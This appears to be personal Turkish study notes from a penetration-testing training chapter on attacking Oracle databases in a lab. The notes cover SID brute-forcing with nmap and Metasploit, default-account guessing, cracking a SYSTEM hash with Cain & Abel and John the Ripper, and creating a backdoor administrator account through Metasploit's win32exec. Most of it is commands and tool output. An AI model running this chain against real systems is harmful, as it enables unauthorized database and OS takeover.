## ÖN BİLGİ

Bu belge

• https://www.slideshare.net/slideshow/pentest-eitimi-uygulama-kitab-bolum-7/60118531

resmi adresindeki veya linkin kırık olması ihtimaline karşın alternatif olarak

 https://www.includekarabuk.com/kitaplik/indirmeDeposu/ Siber\_Guvenlik\_Teknik\_Makaleler/Teori/BaskalarinaAitMakaleler/Veritaban %C4%B1%20S%C4%B1zma%20Testleri.pdf

adresindeki makaleye çalışılarak elde edilen notlarımı kapsamaktadır. Bu çıkarılan notlar belgemde alıntılar ve/veya kişisel ilavelerim mevcuttur.

1)

Bu belgede hedef sistemdeki veritabanına sızarak sistemi ele geçirmeye giden yol şu dört aşamada gerçekleştirilmiştir:

- a. Öntanımlı SID değerine sahip Oracle veritabanlarnın tespit edilmesi
- b. Öntanımlı hesaplardan kapalı ve açık olanların tespit edilmesi
- c. Elde edilen öntanımlı hesapların parola özetlerinin kırılması
- d. Ele geçirilen veritabanı yönetici hesabı üzerinden işletim sisteminin ele geçirilmesi

(Page 2)

2)

SID Nedir?

SID, yani System Identifier sistemde çeşitli versiyonları birarada bulunan veritabanlarını birbirinden ayırt etmeye yarayan, bir nevi instance adını temsil eden değere SID denir.

http://serverfault.com/questions/49509/oracle-difference-between-sid-db-name-db-domain-global-database-name-service

(Benim Not)

3)

Nmap ile Öntanımlı SID Değerine Sahip Oracle Veritabanlarının Tespiti Nmap uygulamasının kendi içerisinde barınan oracle-sid-brute script'i ile hedef sistemdeki öntanımlı SID değerleri tespit edilecektir (Tabi hedef sistemde SID değerlerini öntanımlı halde bırakmışsa...)

> nmap --script=oracle-sid-brute 192.168.1.23 -p 1521

Output:

Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 15:49 EEST Nmap scan report for 192.168.1.23 Host is up (0.00017s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-sid-brute: L ORACLE MAC Address: 00:0C:29:CC:F9:01 (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

Görüldüğü üzere hedef sistemde bulunan oracle'a ait veritabanlarından birisinin SID değerinin ORACLE olarak varsayılanda bırakıldığı, yani öntanımlı değerinin halen kullanılmakta olduğu tespit edilebilmiştir. Eğer bu veritanında bir de kullanıcılar ve parolaları öntanımlı değerlerinde bırakılmışsa veritabanı tamamen tehlikede demektir.

Bu yaptığımız işlemde Nmap aracı belirttiğimiz script'in içerisinde yer alan öntanımlı SID değerlerini sırayla hedef sistemde denemiştir ve tutanı sonuç olarak çıktıya yansıtmıştır. Fakat öntanımlı SID değerleri ülkeden ülkeye değişiklik göstermektedir. Bu yüzden taramaların daha gerçekçi olabilmesi için kendimize ait bir SID wordlist'imiz olmalıdır. Şimdi bir de SID wordlist'i ile hedef sistemdeki öntanımlı SID değerlerini tespit etmeye çalışalım.

> nmap --script=oracle-sid-brute --script-args=oraclesids=/root/Desktop/sid\_wordlist.txt 192.168.1.23 -p 1521

Output:

Nmap scan report for 192.168.1.23 Host is up (0.00027s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-sid-brute: L ORACLE MAC Address: 00:0C:29:CC:F9:01 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds

Görüldüğü üzere yine öntanımlı SID değeri olan ORACLE'ın hedef sistemde olduğu gibi bırakıldığı tespit edilmiştir.

(Page 3-4)

4)

Metasploit ile Öntanımlı SID Değerine Sahip Oracle Veritabanlarının Tespiti

msf > use auxiliary/scanner/oracle/sid\_brute
msf auxiliary(sid\_brute) > show options

Output:

Module Options

| Name             | Current Setting                             |
|------------------|---------------------------------------------|
|                  |                                             |
| BRUTEFORCE_SPEED | 5                                           |
| RHOSTS           |                                             |
| RPORT            | 1521                                        |
| SID              |                                             |
| SID_FILE         | /opt/metasploti/msf3/data/wordlists/sid.txt |
| STOP_ON_SUCCESS  | false                                       |
| THREADS          | 1                                           |
| VERBOSE          | true                                        |
|                  |                                             |

Görüldüğü üzere SID wordlist'i olarak metasploit kendindekini seçili halde sunmuştur. Bunu dilersek değiştirebilmekteyiz. Wordlist'i varsayılan ayarında bırakalım ve RHOSTS'a hedefimizin

IP'sini koyarak öntanımlı SID tespit taramasına başlayalım.

msf auxiliary(sid\_brute) > set RHOSTS 192.168.1.23
msf auxiliary(sid\_brute) > run

Output:

 msf auxiliary(sid\_brute) > run

 [\*] Checking 571 SIDs against 192.168.1.23:1521

 [+] 192.168.1.23:1521 Oracle - 'ORACLE' is valid

 [+] 192.168.1.23:1521 Oracle - 'CLREXTPROC' is valid

 [\*] Scanned 1 of 3 hosts (033% complete)

 [\*] Checking 571 SIDs against 192.168.1.24:1521

 [\*] Checking 571 SIDs against 192.168.1.24:1521

 [-] 192.168.1.24:1521 Oracle - unable to connect to a TNS listener

 [\*] Scanned 2 of 3 hosts (066% complete)

 [\*] Checking 571 SIDs against 192.168.1.25:1521

 [+] 192.168.1.25:1521 Oracle - 'PLSEXTPROC' is valid

 [\*] Scanned 3 of 3 hosts (100% complete)

 [\*] Auxiliary module execution completed

Görüldüğü üzere 3 tane öntanımlı SID değerinin hedef sistemde olduğu gibi bırakıldığı tespit edilebilmiştir.

(Page 4-5)

5)

Öntanımlı Hesaplar Halen Aktif mi Değil mi Tespiti

Oracle veritabanının SID'si tespit edildiğine göre sırada veritabanı kurulurken gelen öntanımlı kullanıcı hesaplarını tespit etmek vardır. Öntanımlı kullanıcı adları sürümden sürüme farklılık göstermekle beraber diyelim ki aşağıdaki wordlist'i kullanacağız.

| BI                 |  |
|--------------------|--|
| PM                 |  |
| SH                 |  |
| K                  |  |
| OE                 |  |
| HR                 |  |
| SCOTT              |  |
| MGMT_VIEW          |  |
| MDDATA             |  |
| SYSMAN             |  |
| MDSYS              |  |
| SI_INFORMTN_SCHEMA |  |
| ORDPLUGINS         |  |
| ORDSYS             |  |
| OLAPSYS            |  |
| ANONYMOUS          |  |
| XDB                |  |
| CTXSYS             |  |
| EXFSYS             |  |
| WMSYS              |  |
| DBSNMP             |  |
| TSMSYS             |  |
| DMSYS              |  |
| DIP                |  |
| OUTLN              |  |
| SYSTEM             |  |

Şimdi yukarıdaki kullanıcı adlarını hedef sisteme sırasıyla Nmap ile deneyeceğiz ve hangilerinin güvenlik gereği kullanıcı tarafından kitlendiğini çıktı olarak göreceğiz. Çıktıda yer almayan kullanıcı adları kitli değil anlamına geleceği için onlar bizim işimize yarayacaktır. Şimdi Nmap ile kitlenmiş öntanımlı hesapları bir görelim:

> nmap --script=oracle-brute --script-args=oracle-brute.sid=xporacle 192.168.1.25 -p 1521

Output:

| Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 21:26 EEST |
|-----------------------------------------------------------------|
| Nmap scan report for 192.168.1.25                               |
| Host is up (0.00019s latency).                                  |
| PORT STATE SERVICE                                              |
| 1521/tcp open oracle                                            |
| oracle-brute:                                                   |
| Accounts                                                        |
| CTXSYS:CHANGE_ON_INSTALL - Account is locked                    |
| DIP:DIP - Account is locked                                     |
| DMSYS:DMSYS - Account is locked                                 |
| EXFSYS:EXFSYS - Account is locked                               |
| HR:HR - Account is locked                                       |
| MDDATA:MDDATA - Account is locked                               |
| MDSYS:MDSYS - Account is locked                                 |
| OLAPSYS:MANAGER - Account is locked                             |
| ORDPLUGINS:ORDPLUGINS - Account is locked                       |
| ORDSYS:ORDSYS - Account is locked                               |
| OUTLN:OUTLN - Account is locked                                 |
| SH:SH - Account is locked                                       |
| SYSTEM:WELCOME1 - Account is locked                             |
| WMSYS:WMSYS - Account is locked                                 |
| XDB:CHANGE_ON_NSTALL - Account is locked                        |
| Statistics                                                      |
| Performed 695 guesses in 8 seconds, average tps: 86             |
| MAC Address: 00:0C:29:C3:3B:62 (VMware)                         |
|                                                                 |
| Nmap done: 1 IP address (1 host up) scanned in 13.00 seconds    |

Görüldüğü üzere "Account is locked" ibaresi ile kitli olan hesaplar belirtilmiştir. Wordlist'te geriye kalanlar ise sızma işlemi için müsait durumda olanlardır. Böylece hedef veritabanında halen aktif olan kullanıcı hesaplarını tespit etmiş oluruz. Daha spesifik belirtmek gerekirse, hedef veritabanında oturum açılabilecek hesapların "kullanıcı adlarını" tespit etmiş bulunmaktayız.

(Page 6-7)

6)

Elde Edilen Parola Özetlerinin Kırılması

Oracle kullanıcılarına ait parolalar sistemde plain text şeklinde tutulmamaktadır. Belirli algoritmalarla şifrelenmiş (hash'lenmiş) şekilde tutulmaktadırlar. Dolayısıyla esas parolayı elde edebilmek için Cain & Abel ya da John The Ripper gibi yazılımları kullanmamız gerekir.

Benim NOT: Kullanıcı adlarını tespit ettik, ama hash'leri nasıl tespit ettik de şimdi onları kırma işlemine başlayabiliyoruz? PDF bu konuda eksik kalmış.

Diyelim ki kullanıcı adı ve şifre şu olsun:

| KULLANICI ADI | PAROLA HASH DEĞERİ |
|---------------|--------------------|
| SYSTEM        | 2D594E86F93B17A1   |

Şimdi bu hash'i hem Cain & Abel ile hem de JTR ile kıralım.

a. Cain & Abel ile Hash Kırma // Denendi, ama şifre kırılamadı (!)

Cain & Abel başlatılır. Cracker sekmesine tıklanılır ve sol menüdeki Oracle Hashes(0) elemanına tıklanılır.

| File View Configure T                                                                                                    | ools Help          |                           |                        |      |      |  |  |  |
|----------------------------------------------------------------------------------------------------|--------------------|---------------------------|------------------------|------|------|--|--|--|
| 😑 💩 😔 🎪 ﷺ 🕮 🖳   + 🎾   🔍 🥄 🖾 📟 🚾 📾 🖾 😂 🖉 🖉 ? │ 🛕                                                                                                    |                    |                           |                        |      |      |  |  |  |
| 🐍 Decoders 🙎 Network 🏟 Sniffer 🥑 Cracker 🔕 Traceroute 🛄 CCDU 💱 Wireless 🚯 Query                                                                                                    |                    |                           |                        |      |      |  |  |  |
| Image VNC-3DES (0)         Usernam           Image VNC-3DES (0)         Usernam           Image VNC-3DES (0)         Image VNC-3DES (0)           Image VNC-3DES (0)         Image VNC-3DES (0)           Image VNC-3DES (0)         Image V | ne Uppercafe Pass. | Case sens. Pass. Uppercat | e Hash Case sens. Hash | Salt | Note |  |  |  |
| CHAP Hashes (0)                                                                                                    |                    |                           |                        |      | >    |  |  |  |
| < > Ora                                                                                                    | acle Hashes        |                           |                        |      |      |  |  |  |
| http://www.oxid.it                                                                                                    |                    |                           |                        |      | li.  |  |  |  |

Ardından ekrana gelen boş tabloya sağ tıklanılır ve Add to List yapılır.

| File View Con<br>File View Con<br>会 蛇 歌 読 開 開<br>後 Decoders 愛 Network | figure Tools He | lp<br>Be Be Maria | iceroute         | a 🗔 🧐 🖉 🚺 💡               | JIL JIL JIL JIL JIL JIL JIL JIL JIL JIL |      |      |
|-----------------------------------------------------------------------|-----------------|-------------------|------------------|---------------------------|-----------------------------------------|------|------|
| VNC-3DES (0) A                                                        | Username        | Uppercase Pass.   | Case sens. Pass. | Uppercase Hash            | Case sens. Hash                         | Salt | Note |
|                                                                       |                 |                   |                  |                           |                                         |      |      |
|                                                                       |                 |                   |                  |                           |                                         |      |      |
| ngd MD5 Hashes (0)                                                    |                 |                   |                  |                           |                                         |      |      |
| <sup>SHA</sup> SHA-1 Hashes (0)                                       |                 |                   |                  |                           |                                         |      |      |
|                                                                       |                 |                   |                  |                           |                                         |      |      |
|                                                                       |                 |                   |                  |                           |                                         |      |      |
|                                                                       |                 |                   | Dictionary At    | tack                      | >                                       |      |      |
|                                                                       |                 |                   | Brute-Force /    | ttack                     |                                         |      |      |
| 9 IKE-PSK Hashes (C                                                   |                 |                   | Didic Forces     | 400 CK                    |                                         |      |      |
| MSSQL Hashes (0)                                                      |                 |                   | Cryptanalysis    | Attack via Kainbow lables | >                                       |      |      |
| MySQL Hashes (0                                                       |                 |                   | Select All       |                           |                                         |      |      |
| Oracle Hashes (0)                                                     |                 |                   | Note             |                           |                                         |      |      |
| Oracle INS Hashe                                                      |                 |                   | Note             |                           |                                         |      |      |
| SIP Hashes (0)                                                        |                 |                   | Test passwore    | ł                         |                                         |      |      |
| - 'g' 802.11 Captures (C                                              |                 |                   | Add as Dis       |                           | Incode                                  |      |      |
| WPA-PSK Hashes                                                        |                 |                   | Add to list      |                           | insert                                  |      |      |
| B WPA-PSK Auth (U                                                     |                 |                   | Remove           |                           | Delete                                  |      |      |
|                                                                       | <               |                   | Remove All       |                           |                                         |      | >    |
| < >                                                                   | 🚯 Oracle Hashe  | es                |                  |                           |                                         |      |      |
| http://www.oxid.it                                                    |                 |                   |                  |                           |                                         |      |      |

Daha sonra username olarak SYSTEM, şifre olarak da 2D594E86F93B17A1 girilir.

| ■ <b>Taín</b>                 | una Taala Ilah  |                                       |                       |                                   |                 |      |      |
|-------------------------------|-----------------|---------------------------------------|-----------------------|-----------------------------------|-----------------|------|------|
|                               | jure Tools Help | <br>_ [                               |                       |                                   |                 |      |      |
| AUTH RESET NTLH               | ₽ <b>  +</b> ₩  | 64 2                                  |                       |                                   |                 |      |      |
| 😤 Decoders 🔮 Network          | 📸 Sniffer 🥑     | Cracker 🔯 Tr                          | aceroute 🔝 CC         | DU 🐒 Wireless 🚯 Q                 | uery            |      |      |
|                               | Username        | Uppercase Pass.                       | Case sens. Pass.      | Uppercase Hash                    | Case sens. Hash | Salt | Note |
| <sup>mgd</sup> MD2 Hashes (0) |                 |                                       |                       |                                   |                 |      |      |
| <sup>md</sup> MD4 Hashes (0)  |                 | Add Orac                              | le Hashes             |                                   | ×               |      |      |
| MD5 Hashes (0)                |                 | C .                                   |                       |                                   |                 |      |      |
| SHA-1 Hashes (0)              |                 |                                       | rt the hash manually  | 11                                |                 |      |      |
| SHA-2 Hashes (0)              |                 | Userna                                | me                    | Hash                              |                 |      |      |
| mine RIPEMD-160 Hash          |                 | SYST                                  | EM                    | 2D594E86F93B17                    | 7A1             |      |      |
| Kerb5 PreAuth Ha              |                 | C.D.                                  |                       |                                   |                 |      |      |
| Radius Shared-Ke              |                 |                                       | np hashes from a data | abase server via UDBL             |                 |      |      |
| B MCCOL HILL (                |                 |                                       | Hequires admin        | istrative credentials of the data | Dase            |      |      |
| MSSQL Hashes (0               |                 |                                       | and Or                | acle ODBC Client installed        |                 |      |      |
| Crasle Hashes (0)             |                 |                                       |                       | OK                                | Canad           |      |      |
|                               |                 |                                       |                       |                                   | Cancer          |      |      |
| SIP Hashes (0)                |                 |                                       |                       |                                   |                 |      |      |
| (a) 802.11 Captures ((        |                 |                                       |                       |                                   |                 |      |      |
| WPA-PSK Hashes                |                 |                                       |                       |                                   |                 |      |      |
| WPA-PSK Auth (0               |                 |                                       |                       |                                   |                 |      |      |
| CHAP Hashes (0)               | r               |                                       |                       |                                   |                 |      |      |
| × 1                           |                 | · · · · · · · · · · · · · · · · · · · |                       |                                   |                 |      |      |
| < > E                         | Uracle Hashes   |                                       |                       |                                   |                 |      |      |
| http://www.oxid.it            |                 |                                       |                       |                                   |                 |      | 1.   |

OK diyerek boş tabloya kırılacak bu şifre eklenir. Ardından eklenen satıra sağ tıklanılır ve Dictionary Attack -> MixCase Hashes sekmesine tıklanılır.

| File View Con         | figure Tools He | łp              |                  |                  |                      |                     | [      |         | Efendim     | НТТР          |
|-----------------------|-----------------|-----------------|------------------|------------------|----------------------|---------------------|--------|---------|-------------|---------------|
| 🛛 🛥 🕹 👶 🎎 🔡           | 🛿 📮 🛛 🕇 🕲       | 😼 📴 🖏           |                  | a 🗖 🥸 💆 🌘        | 1 ° 6                |                     |        |         | Okbal Gurp  | Headers f     |
| 💰 Decoders 🔮 Network  | k 🏟 Sniffer 🥑   | Cracker 🔯 Tra   | aceroute 🔝 CC    | DU 🐒 Wireless    | Duery                |                     |        |         |             |               |
| VNC-3DES (0) 🔨        | Username        | Uppercase Pass. | Case sens. Pass. | Uppercase Hash   | Case sens. Hash      | Salt                |        | Note    | Remellinux  | ISIMTESCIL    |
| MD2 Hashes (0)        | X SYSTEM        |                 |                  | 2D594E86F93B17A1 | Distingen Attack     |                     |        | LIDDEDC | ACT Linghos |               |
| MD4 Hashes (0)        |                 |                 |                  |                  | Dictionary Attack    |                     |        | UPPERC  | ASE Hasnes  |               |
| MD5 Hashes (0)        |                 |                 |                  |                  | Brute-Force Attack   |                     | >      | MixCase | Hashes      |               |
| SHA-1 Hashes (0)      |                 |                 |                  |                  | Cryptanalysis Attack | k via RainbowTables | >      |         |             |               |
| B DIDENAD 160 LIVE    |                 |                 |                  |                  | Select All           |                     |        |         | -           | jully.docx    |
| 160 KIPEIVID-100 Hash |                 |                 |                  |                  | Nete                 |                     |        |         |             |               |
| Rendo PreAuth Ha      |                 |                 |                  |                  | INOTE                |                     |        |         |             |               |
| G IKE-DSK Hacher (    |                 |                 |                  |                  | Test password        |                     |        |         |             |               |
| B MSSOL Hashes (0     |                 |                 |                  |                  | Addas Est            |                     | l      | -       |             | -             |
| D MySOL Hashes (0     |                 |                 |                  |                  | Add to list          |                     | insert |         |             | Komutlari txt |
| Oracle Hashes (1      |                 |                 |                  |                  | Remove               |                     | Delete |         |             | Komutaniku    |
| Oracle TNS Hashe      |                 |                 |                  |                  | Remove All           |                     |        |         |             | _             |
| SIP Hashes (0)        |                 |                 |                  |                  |                      |                     |        |         |             |               |
|                       |                 |                 |                  |                  |                      |                     |        |         |             | Not Körem     |
|                       |                 |                 |                  |                  |                      |                     |        |         |             | Not Kogem     |
| WPA-PSK Auth (0       |                 |                 |                  |                  |                      |                     |        |         |             |               |
| CHAP Hashes (0)       | <               |                 |                  |                  |                      |                     |        |         | >           |               |
| ×                     | Concele Hash    |                 |                  |                  |                      |                     |        |         | -           |               |
| < >>                  | ug oracle hash  | -               |                  |                  |                      |                     |        |         |             | WebScarab     |
| http://www.oxid.it    |                 |                 |                  |                  |                      |                     |        |         | 1           |               |

Sözlük eklemek için açılan ekrandaki üst tabloya sağ tıklanılır ve Add to List denir.

|                           | Dictionary Attack                | ×                                         |      |
|---------------------------|----------------------------------|-------------------------------------------|------|
| File View Configure T     | Dictionary                       |                                           |      |
| 🔄 🏟 🕹 🕅 🎆 🎆 📮             | File                             | Position                                  |      |
| 🚴 Decoders 🔮 Network 📦 Sn |                                  | Add to list Insert                        |      |
| VNC-3DES (0) ^ Usernam    |                                  | Change initial file position              | Note |
| MD2 Hashes (0) X SYSTE    |                                  | Prost initial file and iter               |      |
|                           | Key Rate                         | Reset Initial file position               |      |
|                           |                                  | Reset all initial file positions          |      |
|                           |                                  | Remove from list                          |      |
|                           | Dictionary Position              | Remove normalise                          |      |
|                           |                                  | Remove All                                |      |
| 🐼 Kerb5 PreAuth Ha        |                                  | Uppercase (Password · PASSWORD)           |      |
|                           | Current and and                  | Num. sub. perms (Pass,P4ss,Pa5s,P45sP455) |      |
| IKE-PSK Hashes (C         | Callent password                 | Case perms (Pass,pAss,paSs,PaSsPASS)      |      |
| MSSQL Hashes (0           |                                  | Iv Two numbers Hybrid Brute (Pass0Pass99) |      |
| MySQL Hashes (0           |                                  |                                           |      |
| Oracle Hashes (1          | 1 hashes of type Oracle (MixCase | ) loaded                                  |      |
| Oracle TNS Hashe          | Press the Start button to begin  | dictionary attack                         |      |
| SIP Hashes (0)            |                                  |                                           |      |
|                           |                                  |                                           |      |
| WPA-PSK Hashes            |                                  |                                           |      |
| WPA-PSK Auth (0           |                                  |                                           |      |
| CHAP Hashes (0)           |                                  |                                           |      |
| Y IB a                    |                                  |                                           |      |
| < > Ora                   |                                  |                                           |      |
| http://www.oxid.it        |                                  | Start Exit                                | li.  |

Daha sonra hazıralanan wordlist dosyası seçilir ve OK denir.

| ≖ <b>Laín</b><br>File View Configure T | Dictionary Attack | Open                                                                                           | X                                      |
|----------------------------------------|-------------------|------------------------------------------------------------------------------------------------|----------------------------------------|
| 🔄 🏟 🚱 NTLM SPOOF SPOOF                 | File              | $\leftarrow$ $\rightarrow$ $\checkmark$ $\bigstar$ Inis PC $\rightarrow$ Desktop $\rightarrow$ | <ul> <li>マ O Search Desktop</li> </ul> |
| 虑 Decoders 🔮 Network 🏟 Sni             |                   | Organize 👻 New folder                                                                          | <b>■</b> • <b>■</b> ?                  |
| MD2 Hashes (0)                         |                   | A Quick access                                                                                 |                                        |
| md MD4 Hashes (0)                      | Key Bate          | 📃 Desktop 💉 🔼                                                                                  |                                        |
| mg MD5 Hashes (0)                      |                   | 🕹 Downloads 🖈 🧧 🧲                                                                              |                                        |
| SHA SHA-1 Hashes (0)                   | - Diotionary Roa  | 🛱 Documents 🖈 🔳                                                                                |                                        |
| SHA-2 Hashes (0)                       | Dictionaly ros    | 2016-2017akade Fen Bilimleri                                                                   | HTTP Headers oracle wordlist.tx        |
| 160 RIPEMD-160 Hash                    |                   | miktakvim.pdf Enstitüsü                                                                        | for Dummies - t                        |
| Kerbb PreAuth Ha                       |                   | Inceleniyor Olan                                                                               | Tuts+ Code                             |
| Kadius Shared-Ke                       | Current passw     | 📙 Raporun Son Ha                                                                               | lutorial                               |
| B MSSOL Hashes (0                      |                   | Sertifikalar                                                                                   |                                        |
| MvSQL Hashes (0                        |                   | Tekrarlanivor Ola                                                                              |                                        |
| Oracle Hashes (1                       | 1 hashes          |                                                                                                |                                        |
| Oracle TNS Hashe                       | Press th          | ConeDrive                                                                                      |                                        |
| - 🔏 SIP Hashes (0)                     |                   | This point of the Transl CMD                                                                   |                                        |
| - 6 802.11 Captures ((                 |                   | Komutlari.txt                                                                                  | ~                                      |
| - WPA-PSK Hashes                       |                   |                                                                                                |                                        |
| WPA-PSK Auth (0                        |                   | File name: oracle_wordlist.txt                                                                 | ✓ Text (*.txt) ✓                       |
| CHAP Hashes (0)                        |                   |                                                                                                | Open Cancel >                          |
| 🖌 🖒 Ora                                | 1                 |                                                                                                | Cancer                                 |
| http://www.oxid.it                     |                   | Sta                                                                                            | t Exit //                              |

Yukarıda görüldüğü üzere oracle\_wordlist.txt dosyası seçilmiştir.

|                                                                                                    | Dictionary Attack                                                              | >                                                                                                    |       |
|----------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|-------|
| File View Configure T                                                                                                    | Dictionary                                                                     |                                                                                                    |       |
|                                                                                                    | File C:\Users\Hasan\Desktop\oracle_wordlist.txt                                | Position                                                                                                    |       |
| 👶 Decoders 🔮 Network 🟟 Sn                                                                                                    |                                                                                |                                                                                                    |       |
| Image: WNC-3DES (0)         ▲           Image: WD2 Hashes (0)         Image: WD2 Hashes (0)           Image: WD2 Hashes (0)         Image: WD2 Hashes (0) | Key Rate                                                                       | ptions                                                                                                    | Note  |
| MD5 Hashes (0)<br>SHA SHA-1 Hashes (0)<br>SHA-2 Hashes (0)<br>SHA-2 Hashes (0)<br>SHPEMD-160 Hash                                                         | Dictionary Position                                                            | As Is (Password)<br>Reverse (PASSWORD - DROWSSAP)<br>Double (Pass - PassPass)<br>Lowercase (PASSW/0RD - password)                                            |       |
| Kerb5 PreAuth Ha     Kadius Shared-Ke     Gi IKE-PSK Hashes (C     MSSOL Hashes (C)                                                                       | Current password                                                               | Uppercase (Password - PASSWORD)<br>Num. sub. perms (Pass.P4ss,Pa5sP45sP45s)<br>Case perms (Pass.pAss.paSsPaSsPASS)<br>Two numbers Hybrid Brute (Pass0Pass99) |       |
| MySQL Hashes (0    Oracle Hashes (1     Oracle TNS Hashe                                                                                                  | 1 hashes of type Oracle (MixCase) lo.<br>Press the Start button to begin dict: | aded<br>ionary attack                                                                                                    |       |
|                                                                                                    |                                                                                |                                                                                                    |       |
| <                                                                                                    |                                                                                |                                                                                                    | >     |
| http://www.oxid.it                                                                                                    |                                                                                | Start Exit                                                                                                    | ] //. |

Şimdi yukarıda gözüken ekrandaki START butonuna basılarak sözlük saldırısı başlatılır. Şifre kırıldığında wordlist'in gösterildiği satıra tick konackatır.

| sden 9 Network 🖬 Sothe                         | Crocker 🔯 Traceroute                                 | CCDU "8" Wireless               | () Query                                     |                    |     |       |  |
|------------------------------------------------|------------------------------------------------------|---------------------------------|----------------------------------------------|--------------------|-----|-------|--|
| WL Hes (II)<br>Saco ICS-MD5 Hashes (II)        | <ul> <li>Username Upp</li> <li>W Cristian</li> </ul> | ercane Pass.   Cane sero. Pass. | Oppercase Hash                               | Case sent. Math    | Set | Täote |  |
| Dece PDI-MD5 Hacker (0)<br>(PDF-MD5 Hacker (0) | Deterary Attack                                      |                                 | Terroritor present                           | and the            | 1   |       |  |
| RAAA MOS Hanhas (0)                            | Datapas                                              |                                 |                                              |                    |     |       |  |
| SPF-MDS Hartes (0)                             | 710                                                  | 2                               | Posten                                       |                    |     |       |  |
| RRP HMAC Herbes (D)                            | C Program Florid                                     | wittender/Wedlettel             | 1910681                                      |                    |     |       |  |
| NC-3DES (0)                                    |                                                      |                                 |                                              |                    |     |       |  |
| (D) Hashes (D)                                 |                                                      |                                 |                                              |                    |     |       |  |
| AD4 Hastes (D)                                 |                                                      |                                 |                                              |                    |     |       |  |
| AES-MailMes (3)                                | - Kee Tale                                           |                                 | Options                                      |                    |     |       |  |
| VAL-2 Hacture (D)                              |                                                      | L'Ach Parmet                    |                                              |                    |     |       |  |
| (PDAC-188 Hashes III)                          | Distance Poston                                      |                                 | P Revena (PASSVDPD                           | DIROWSSAPS         |     |       |  |
| arb5 PreAuth Hashes (0)                        | A Contraction                                        |                                 | Poule Fair Paire                             | 6                  |     |       |  |
| lation Shared-Key Hindnes (0)                  | <u>1</u>                                             |                                 | F three are Fairment                         | PASSWORD           |     |       |  |
| (C-PSK Hashes (D)                              | 1 martine and                                        |                                 | P Nas nat percellars                         | No.Pub., P45, P491 |     |       |  |
| A-SCI Harber (II)                              | Creat betweet                                        |                                 | Case petra (Fran phas                        | ants, Pata, PASS   |     |       |  |
| Iracle Hasher (2)                              | 1                                                    |                                 | <ul> <li>Two mandhers Piljderd Br</li> </ul> | a Parti Partil     |     |       |  |
| Inacle TMS Hathes (E)                          | The second second                                    |                                 | _                                            |                    |     |       |  |
| IF Heches (1)                                  | attack stoppe                                        | 1001 STATEN 16 CRECTS           |                                              |                    |     |       |  |
| 02.11 Ceptures (8)                             | 1 of 1 hashes                                        | cracked                         |                                              |                    |     |       |  |
| The Par Hatter (1)                             |                                                      |                                 |                                              |                    |     |       |  |
| HalP Hashes (D)                                |                                                      |                                 |                                              |                    | -   |       |  |
|                                                | 1                                                    |                                 |                                              |                    |     |       |  |
| m trid it                                      |                                                      |                                 |                                              |                    |     |       |  |

Yukarıdaki pencerenin alt tarafında yer alan textarea'da ise kırılan şifre gösterilecektir:

Plaintext of user SYSTEM is **ORACLE** 

Böylece şifrenin ORACLE olduğunu tespit etmiş olacağız.

b. John The Ripper ile Hash Kırma

Oracle 11 öncesi hash'ler için;

> john --format=oracle --wordlist=/root/Desktop/rockyou.txt hash.txt

Oracle 11 ve sonrası hash'ler için;

> john --format=oracle11 --wordlist=/root/Desktop/rockyou.txt hash.txt

Çıktı şöyle olacaktır:

Loaded 1 password hash (Oracle 10 DES [32/64]) Remaining 1 password hash **ORACLE** (?) guesses: 1 time: 0:00:00:00 DONE (Thu Sep 4 18:05:51 2014) c/s:638850

Görüldüğü üzere şifrenin ORACLE olduğu tespit edilebilmiştir.

(Page 8-10)

## 7)

Ele Geçirilen Veritabanı Hesabı Üzerinden İşletim Sistemini Ele Geçirme Oracle veritabanında bulunan kullanıcıların dolaylı yoldan işletim sistemi üzerinde komut çalıştırma yetkileri vardır. Şimdi şifresini kırdığımız kullanıcının hesabını kullanarak metasploit'in win32exec auxiliary'si ile hedef sistem üzerinde CMD komutu çalıştıralım.

msf > use auxiliary/admin/oracle/post\_exploitation/win32exec msf auxiliary(win32exec) > show options

Module Options

| Name   | Current      | Required | Description               |
|--------|--------------|----------|---------------------------|
|        |              |          |                           |
| CMD    | ipconfig     | no       | The OS command to execute |
| DBPASS | ORACLE       | yes      | The password              |
| DBUSER | SYSTEM       | yes      | The username              |
| RHOST  | 192.168.1.23 | yes      | The Oracle Host           |
| RPORT  | 1521         | yes      | The DB Port               |
| SID    | ORACLE       | yes      | The SID of DB             |

Hedef veritabanının barındığı işletim sisteminde bir backdoor oluşturmak için yeni bir kullanıcı ekleyelim. Bunun için modülün CMD parametresine aşağıdaki girilir:

msf auxiliary(win32exec) > set CMD "net user bga bga /add"
msf auxiliary(win32exec) > run

Böylece hedef veritabanı üzerinden hedef işletim sisteminde bga username'li ve bga şifreli bir kullanıcı oluşturmuş olduk. Bu eklediğimiz kullanıcıyı Windows sistemlerinin en yetkili kullanıcı grubuna eklemek için aşağıdaki CMD komutu CMD parametresine set edilmelidir.

msf auxiliary(win32exec) > set CMD "localgroup administrators bga /add"
msf auxiliary(win32exec) > run

Böylece Oracle veritabanının açığından faydalanarak hedef işletim sistemini ele geçirmiş olduk.

Buraya kadar ki işlemleri özetleyecek olursak önce hedef veritabanın SID değerini wordlist ile tespit ettik. Ardından hedef veritabanında öntanımlı username'lerin hangilerinin kitli olmadığını, yani hangisinin aktif olduğunu yine bir wordlist ile tespit ettik. Daha sonra tespit ettiğimiz öntanımlı hesaplardan birinin parola özetini kırdık ve şifresini plain text formatında elde ettik. En sonunda ise metasploit'teki bir modülün parametrelerine elde ettiğimiz **SID** değerini, **username**'i, **password**'ü, IP'yi, Port numarasını ve çalıştırmak istediğimiz sistem komutunu girerek hedef işletim sistemini ele geçimiş olduk.

(Page 11-13)